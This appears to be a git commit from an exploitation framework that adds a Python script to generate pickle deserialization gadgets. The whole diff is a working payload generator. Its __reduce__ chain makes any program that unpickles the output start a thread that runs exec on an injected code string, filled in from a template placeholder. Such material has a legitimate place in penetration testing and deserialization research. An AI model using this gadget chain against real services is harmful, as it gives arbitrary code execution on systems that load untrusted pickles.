Add source code for Python deserialization gadgets

2024-03-28 17:44:22 -04:00
parent fb073cf21a
commit e5635c4bfd
3 changed files with 25 additions and 0 deletions
@@ -0,0 +1,14 @@
+import pickle
+import threading
+
+class CreateThread:
+    def __reduce__(self):
+        return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',))
+
+class GadgetChain:
+    def __reduce__(self):
+        return threading.Thread.start, (CreateThread(),)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))